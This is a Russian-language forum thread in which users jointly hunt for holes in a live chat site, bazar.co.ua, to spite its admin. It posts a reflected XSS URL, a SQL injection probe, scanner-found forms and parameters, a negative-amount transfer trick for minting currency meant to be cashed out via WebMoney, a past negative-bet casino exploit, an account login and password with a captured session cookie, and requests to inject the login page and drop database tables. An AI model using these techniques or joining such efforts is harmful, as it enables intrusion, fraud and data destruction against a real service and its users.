Проверьте чат www.bazar.co.ua на уязвимости, я б сам бы рад попыхтеть над ним, вот время не позволяет, админ редкая сволочь, вобще оборзел.

Вот пассивная ХСС http://www.bazar.co.ua/?error[]=<script>confirm(/xxx/)</script>

Ошибка SQL однако бесполезная, тут идет фильтрация

http://chat.bazar.co.ua/photo/show.php?user_id=139983&photo=-999

Так лень было вручную искать....что прибег к помощи сами знаете чего=)

Ссылка - _http://www.bazar.co.ua/robots.txt
Содержание : информация
Ссылка - _http://www.bazar.co.ua/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
Содержание : информация о PHP

если че еще нарою-выложу


Вот есть список ссылок с параметрами и список форм..

Список форм использующихся для передачи данных на сервер:

POST / HTTP/1.1
action=&login=&password=&sex=&sex=&sex=&input_color=&input_color=&input_color=&input_color=

POST /etc/opros/index.php HTTP/1.1
id=&do=&answer=&answer=&answer=&answer=&answer=&answer=&answer=&answer=

POST /games/roulette.php HTTP/1.1
action=&session=&cvet_pay=&cvet=&chet_pay=&chet=&column_pay=&column=&dozen_pay=&dozen=

POST /index.php HTTP/1.1
action=&login=&password=&input_color=&input_color=&input_color=&input_color=&input_color=&input_color=&input_color=

POST /lost_password.php HTTP/1.1
do=&log=&email=

POST /feedback.php HTTP/1.1
email=&sendform=

POST /games/slot-mashine.php HTTP/1.1
action=&session=&pay=


Список ссылок найденных на веб-сервере, которые используют какие-либо параметры:

/enter.php?action=1&login=1&password=1&input_color=1&input_color=1&input_color=1&input_color=1&input_color=1&input_color=1&input_color=1

/forum2/message.php?theme_id=1494&subtheme_id=1302&guest=yes

/forum2/message.php?theme_id=1494&subtheme_id=1302

/forum2/theme.php?subtheme_id=1302&guest=yes

/etc/advertisement/click.php?id=103

/photo/show.php?user_id=184669

/frame/rating.php?user_id=

/etc/zzz/click.php?id=108

/etc/opros/?do=result

/photo/show.php?cat=m

/forum2/?guest=yes

/games/?game=2

/games/?cat=0
ну да..вот скуль _http://www.bazar.co.ua/forum2/message.php?theme_id=1'&subtheme_id=1302&guest=yes
PS зырить исходники...

вот еще что, в это чатике есть своя валюта - основная и игровая (конвертить можна только основную в игровую), основную пополнить можна смской, трансфером (т.е от одного пользователя к другому) или через вебмани; игровая - само название говорит за себя, пополнить можна выиграшем или трансфером.

Платить за разные функции чата можна и той и той валютой, но эт неважно, важно то что в скором времени "основными" можна будет платить не только за чатовские функции, но и другие, та что меня заинтересовала - переводить их обратно в вебмони, , вот это уже веселей)))

смс - очень сложно что-то придумать так, как связь идет через оператора связи к серверу без использования пользователя...

ломать игры ...это несерйозно...

а вот над трансфером можна поработать, если успею то выложу, то что успел нарыть...
просто ща не в своем родном городе:)...как приеду отзовусь....

Вот как наступит "скорое время", так и отзовись=))

С трансфером есть глюк)))
На сумму есть свой диапозон, здесь он сравнительно маленький))
Так что, если при переводе из основных в игровые вводите -9999999, (курс 5:1), и вертите с ними пока из нуля или минуса не превратиться в хорошенькую сумму))))Пояснение - Нет проверки на превышение диапозона))))
Позже выложу алгоритм))))
И не нада ниче ломать))))
Ломать нада было раньше, во всех играх не было проверки на ставку меньше 0, просто даже Инеткряком посылать переменную ставки меньше 0, ну а икряк я взял для того чтоб обойти ставку, т.к. на самой страничке ставка выбирается из списка))))
Суть - нада проиграть, то есть вы проигрываете -x)))
Админ уже закрыл эту дИрочку....кому интересна просто почитайте какую ошибку выдает сервер)))))

Помогите иньекнуть enter.php

...или что нить подкиньте, какую нить дырочку)))))
Если канечна не сложна
вот
логин 4i4en
пасворд 12345

народ прошу совета. до недавнего времени при регистрации нового ника использовалась ламерская проверка от аврорегистрации, но пару дней назад админ в злости поставил проверку, используя супер-бан. как можно программно съемулировать строку этого супер-бана, чтобы программно можно было войти? даже сохраняя стр. на диск не получается обойди запрет.
и еще вопрос-никак не врублюсь, как происходит отсылка сообщений в чат. там нет сабмита и как-то пишется в фрейм. можно ли съемулировать отсылку пост или гет запросом?
а лучше б конечно ломануть его, ну или снести хотяб пару таблиц

GET http://www.bazar.co.ua/frame/get.php?session=fa993200efe236f9966b630b9298617a&last_all_message=11506509847222&last_privat_message=11506504855831 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ssf, */*
Referer: http://www.bazar.co.ua/enter.php
Accept-Language: et
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.bazar.co.ua
Cookie: b=b; e-rate=yes; user_login=4i4en; user_sex=m; user_color=414141; user_room=0; chat_session=fa993200efe236f9966b630b9298617a


Naviscope перехватил такой пакет отправки сообщений.

по поводу нет submit я не понял, у тебя что имеються исходники этого чата?

исходников нет, просто посмотрел хтмл код отсылки сообщения. там нет явного сабмита формы, а данные скриптом присваиваются фрейму